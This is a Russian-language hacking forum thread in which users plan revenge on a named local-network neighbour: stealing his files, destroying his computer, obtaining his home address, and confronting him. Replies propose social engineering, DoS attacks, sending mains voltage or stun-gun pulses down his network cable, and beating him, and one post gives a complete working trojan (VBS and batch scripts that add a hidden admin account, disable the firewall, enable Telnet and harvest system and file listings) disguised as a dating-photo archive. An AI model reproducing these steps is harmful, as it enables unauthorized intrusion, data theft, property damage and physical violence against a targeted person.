terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » Локальная сеть


Локальная сеть

Сообщений 1 страница 20 из 23

1

Народ подскажите как можно украсть с компа подцеплённого к одной со мной локалке паренька файл тхт? а потом и ваще похерить его комп, а главное не оставить следов. И вообще эти процессы всегда выполняются одинаково или для локалки можно по другому, по легче и по надёжней?

+1

2

Парня можно смело наказывать. Он урод на фтп с netaccess постоянна все папки удаляет или по дурацки их переименовывает...
В блокноте, знаю точна, он хранит свою анкету, там для одного опроса, ток не знаю где именно... Всё фтп изза него разваливается, никто не хочет ничо выкладывать, потому что этот урод всё равно удалит...

0

3

ReistLen
А поподробнее можно?  Что за сеть, что у чувака стоит, если известно, и вообще чё у тя там можно в ней тварить, если он удоляеть, значит есть какаято дыра, каторую надо найти.

Ты хоть премерно знаешь где этот файл у него находится и как он называется?

Отредактировано GRAF_INCOGNET (2008-02-10 01:48:13)

+1

4

2 ReistLen
Так нафиг эту анкету красть! Набейте ему е*ло!
А если серьезно, то уточни, за отдельной ли он тачкой сидит(я так понял, что да), какая ОСь стоит, если винда, то какие папки расшареные, где сам файл лежит и т.п. И самое главное, имеешь ли ты доступ к его компу?!! Хоть косвенный?! Ведь через сетку ломать, ИМХО, вряд ли получиться, а если тебя к его компу подпустят, то можна ой как много всякой дряни ему сделать!
Если доступа к компу не имеешь, то лучше соц. инженерию пускать в ход!!!

Отредактировано flash (2008-02-10 03:39:33)

0

5

GRAF_INCOGNET
Что за сеть я не знаю :( , подскажите как узнать и я скажу (потому что ИМХО они все одинаковые :) )
На компе у него стоит маздай.
У нас фтп поделенно на папки типа видио, музыка, софт и т.д. здесь ничо менять по идее нельзя, и есть папка netaccess вот туда всё и заливают или просят залить, именно там этот хмырь и орудует.
Насчёт файла понятия не имею где, даже не знаю на сколько дисков винт разбит :(  А назыается он скорее всего Анкета.тхт

0

6

flash
Анкету именна для этого и нада красть :)  А ты как думал? :cool:
Сидит он за отдним компом, ну я так думаю...
ОСь - не буду повторяться..
Насчёт расширенных папок... сейчас нет, но переодически открывает на 1-3 часа,
через них и можно возыметь доступ (как сказал та! :D )
Соц. Инженерией давно уже почти вся сеть занимается.. через неё и ip в локалке пробили...

0

7

Давайте уже трахнем комп этому подонку, чтоб знал как людям вредить!
А за одно и поговорим с ним хорошенько в реале, через адресок в анкетке, чтоб такова больше не повтарилось..

0

8

Ах да... забыл сказать. То, что у нас называют фтп - это просто хранилище информации размером 9.8 Tb на компе/компах (не знаю точна) провайдера интернет.
О структоре:
Люди выкладывают либо по своей инициативе, либо по чей то просьбе файлы в папку netaccess , которые админы распихивают в РО (папках типа музыка, видео). В папке netaccess даётся полный пакет прав любому ip подключённому к нашему провайдеру, в папках РО только лишь возможность запустить или скачать. Тоесть по сути дела содержимое  папки netaccess может удалить любой дурак, но почему то этого не делают, за исключением одного идиота, который всем портит жизнь.. Короче если захатеть то мона аж троян в netaccess вылажить. Но люди у нас там не тупые да и к тому же папку 4 раза в день сканируют антивиром.
Вот такое вот примитивненькое у нас фтп, но очень даже полезное (например, я самый лучший фильм за 2дня до выхода в киноеатрах с нормальным качеством оттуда скачал)
И вот жили мы очень даже харошо, обменивались файлами, и тут к нам подрубился этот упырь..И всё рухнуло, теперь фтп ваще почти пустое. Админы смотрят на это закрытыми глазами, говорят тип юредически не имеем права ничо с ним сделать и ваще по идее если его наказывать со стороны провайдера, то он возьмёт и в суд на них подаст, и всех админов нафиг
пересажают (дурацкий закон вышел :( ). Адрес его тоже говорить не хотят...
Дак вот, тут лишь 3 выхода: либо ему тачку трахнуть, чтоб
ему не черезчо было балаваться, либо поговорить с ним хорошенько (для этого адрес его нужен,который анкете), а лучше и то и другое..

0

9

ReistLen
Попробуйте поговорить с админами (так чтоб они дали адресок его, или уговорить это сделать, но чтоб об этом никто не знал), там где он живёт нийти линию подключения к сети, акуратненько её оборвать, и на его сторону запулить порядочный импульс ( например с блока питания, с высокой стороны, там порядка 400 вольт и 1-2кГц, но они разные бывают), и запульте ему туда, главное чтоб у него тачка была включина, ну на кройняк уже затульте электрошокером...  жестокий я однако...

А ещё есть такой вариант, но насчет как ето делать я не знаю, но поробуйте его задосить или запинговать, простити если я нитак вырозился....

0

10

GRAF_INCOGNET
ох... ты чот перегнул немнога ^_^  нельзя, что нибудь полегче? Да и вообще ходить по городу с ножиком, резать провода, как-то не в моих принципах... думаю ты понимаешь. Говорить с админами пробовали и не раз. Результат думаю ясен (такое ощущение, что они сами его адрес незнают).

А вот насчёт задосить или запинговать ет можна. Кто знает как, поделитесь своим опытом.

0

11

ReistLen
а те ножик не нужен, те надо найти где он втыкается в сеть, точнее сказать в линию, и там оборвать провода...

А запинговать, или точнее задосить, если я ошибаюсь то поправте, в соответствующей теме...

0

12

Дык мона просто его убалтать на то чтоб адрес сказал  (СИ) ,    Да если живёт в многоэтажке тама щит должен быть на каждую лестничную клетку, открываеш и смориш провод от его квартиры инетовский, тихонько, снимаеш обмотку НЕ ПОВРЕЖДАЯ ПРОВОДОЧКИ.... потом из етого же щита достаёш провод на 220 или 360 (точно незнаю) , обрезаеш, оголяеш концы и шуруеш концами по оголённому инетовскому шнуру Главное +\- не замкни между собой.

0

13

В щитке:  фаза и ноль - 220 вольт
               фаза и фаза - 380 вольт

Но думаю лучше 380... эфектнее, а лучше электро шокер...

0

14

У меня кабель просто с крыши бросили через балкон.
Reistlenу может проще будет бэкдор нормальный поставить и Соц.Инж. не стоит недооценивать. Пробуй разные способы. Через мыло (типа ты красавица обалденная хош с ним познакомится и можеш даже фотку ему прикольную кинуть) или через асю. Или открой доступ к серваку и пусти утку шо в такой папке лежат данные на всех пользователей(у админа спер). Короче способов много бывает. А провода резать - грубо слишком (но согласен, эффективно))) ).

0

15

Блин Вы какието злые садисты-вандалы!
Ужас!
Нинада ниче реззать рвать и т д!
Согласен с roxa через СИ достаем реал адрес и... КУВАЛДОЙ ЕГО  па башке, манитору и винту, БУм-бум-бум-Бац. И быренко из квартиры....

ЗЫ сор мну заносит... Мну седня день тяжелый будет

0

16

RmXUA
Так фишка в том что если ему туды ляпнуть элктрошокером, и он в это время сидит за компом, прикинь какой он приход поймает, и провода потом окуратненько назат поставил и всё ништяк, и никто ненает что ето был ты...  А ему как минимум новый комп придётся покупать.

0

17

GRAF_INCOGNET написал(а):

А ему как минимум новый комп придётся покупать.

в моем варианте полосой скотча тоже не отделаешся....

Но в принципе ті прав

0

18

У наст тут что общество маньяков или недоученых хакеров?
Тут все простои очень согласен с 

roxa написал(а):

Через мыло (типа ты красавица обалденная хош с ним познакомится и можеш даже фотку ему прикольную кинуть) или через асю. Или открой доступ к серваку и пусти утку шо в такой папке лежат данные на всех пользователей(у админа спер). Короче способов много бывает

Наша задача вывести тачку из строя программами или скриптами !
ТУТ объясню пошагово!
Вот пример
1качаешь картинки с сайта знакомст какой нибудь красивой девки.
2Создаешь например папку Mashenka
3Кладешь туда фото и два файла run.vbs и run.cmd

4Создаем файл run.vbs
----------------------------------------------------------------------------------
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run"C:\Mashenka\run.cmd ", 0, true
----------------------------------------------------------------------------------

5 Создаем run.cmd
----------------------------------------------------------------------------------
@echo off
net user root pass /add > nul
net localgroup Ђ¤¬Ё­Ёбва в®ал root /add > nul
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg > nul
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg > nul
@echo "root"=dword:00000000>>%SystemRoot%\tmp.reg > nul
regedit /s %SystemRoot%\tmp.reg > nul
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp2.reg > nul
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%SystemRoot%\tmp2.reg > nul
@echo "forceguest"=dword:00000000>>%SystemRoot%\tmp2.reg > nul
regedit /s %SystemRoot%\tmp2.reg > nul
sc config wscsvc start= disabled > nul
sc config SharedAccess start= disabled > nul
sc config tlntsvr start= auto > nul
sc stop wscsvc > nul
sc stop SharedAccess > nul
sc start tlntsvr > nul
echo Инфа о компе > C:\`boot.ini
systeminfo >> "C:\`boot.ini"
echo >>C:\`boot.ini
echo Список файлов на диске С>>C:\`boot.ini
tree C: /F /A >>C:\`bood.ini
echo >>C:\`boot.ini
echo Список файлов на диске D>C:\`boot.ini
tree D: /F /A >>C:\`bood.ini
echo >>C:\`boot.ini
echo Список файлов на диске E>C:\`boot.ini
tree E: /F /A >>C:\`bood.ini
echo >>C:\`boot.ini
echo Список файлов на диске F>C:\`boot.ini
tree F: /F /A >>C:\`bood.ini
echo >>C:\`boot.ini
attrib +r +a +s +h C:\`bood.ini
del %0
----------------------------------------------------------------------------------

Для скрытие наших файлов поместить в папку с файлами !
sec.bat
-------------------------------------------------------
@echo off
attrib +r +a +s +h run.vbs
attrib +r +a +s +h run.bat
del sec.bat
-------------------------------------------------------

6 Запоковывешь пакпу с помощью WinRarа
галочку на Создать SFX архив
Допалнительно -> Пармаетры SFX
Пишите Абсолютный путь C:\Mashenka
Указать после рапаковки запустить run.vbs
В заклатке Режимы выбрать Скрыть всё!
7 Отсылаешь ему через e-mail, ICQ(нужно зарегистрировать новый UIN)
Представляешьс девушкой Машей говрои хош познакомиться ну приудмашь !

После распаковки процесс сам запуститься ! В невидемом режиме ! Во первых у тебя сразу после выполнения будет много инфы о нём !
Telnet доступ с портом 23 Логин:root Пароль:pass
Вся инфа будет доступно в одном файле `boot.ini, но есть и минусы и не мало
1 Заставить запустиь архив как ты сделал !
2 `boot.ini открываеть прийдётся или из по MSDOS или FaR Manager

Отредактировано inname3 (2008-07-04 14:20:51)

0

19

Здрасте люди!
У меня такая проблема раньше у нас по дому была хорошая локальная сеть, но по ней начили распростронять всякие вирусы и т.д.
И в этой бодяги обвинили миня =( После этого мя они матом начили покрывать и зихирить над моим кампом устраевая Dos атаки!!!
У меня к вам большая просьба помогите, я научился отбиватся от Dos атак и теперь хочь сам над ними жистоко зихирить!!!
В этом деле мне могут помочь ещё 2человека по лок.сетке но мы очень плохо в таких делах расбираемся =(
Плиз раскажите каойнибуть способ чтобы риально назихирть им...

P.s Сори.. но я не умею красноречиво писать и написал как получилось :dontknow:

0

20

DooM1 написал(а):

зихирить!!!

я такого никогда в жизни не слышал слова)))))))
попробуй для начала сканер какой-нить...

inname3 написал(а):

2Создаешь например папку Mashenka

извини это читается машонка или Машенька? :rofl:
а*уеть тут нафлудили... а сканера нормального человеку никто не посоветовал...
DooM1 обратись к gangs'у он недавно что-то из этой оперы тестил и очень удачно...

0


Вы здесь » terminal-s52 » Хакинг » Локальная сеть